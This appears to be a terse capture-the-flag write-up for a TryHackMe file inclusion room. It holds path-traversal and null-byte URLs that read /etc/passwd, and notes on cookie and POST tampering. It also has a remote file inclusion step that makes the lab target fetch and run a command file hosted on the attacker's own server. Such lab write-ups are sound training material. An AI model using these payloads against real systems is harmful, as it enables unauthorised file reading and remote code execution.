File Inclusion
Room Link: https://tryhackme.com/room/fileinc
Give Lab #1 a try to read /etc/passwd. What would the request URI be?
In Lab #2, what is the directory specified in the include function?
Give Lab #3 a try to read /etc/passwd. What is the request look like?
Input field didn't work but we were able to bypass by entering our command in the web browser instead.
URL: hxxp://10.10.230.14/lab3.php?file=..//..//../../../etc/passwd%00
Which function is causing the directory traversal in Lab #4?
file_get_contents
Try out Lab #6 and check what is the directory that has to be in the input field?
THM-profile
Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value
Only worked in browser
hxxp://10.10.230.14/lab6.php?file=THM-profile//..//..//..//..//etc//os-release%00
Capture Flag1 at /etc/flag1
Capture Flag2 at /etc/flag2
Change the value from Guest to Admin and we can bypass the error message above.
Change the value to the flag and we can see it on the page.
What it would look like in burp.
Capture Flag3 at /etc/flag3
Page is getting rid of our slashes
Changing to post and added extra slashed and null character at end.
Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?
Kali
Created the following file to run the hostname command.
Kali
Host the file
python2 -m SimpleHTTPServer 81Browser
hxxp://10.10.230.14/playground.php?file=http://10.10.11.193:81/cmd.txt
Last updated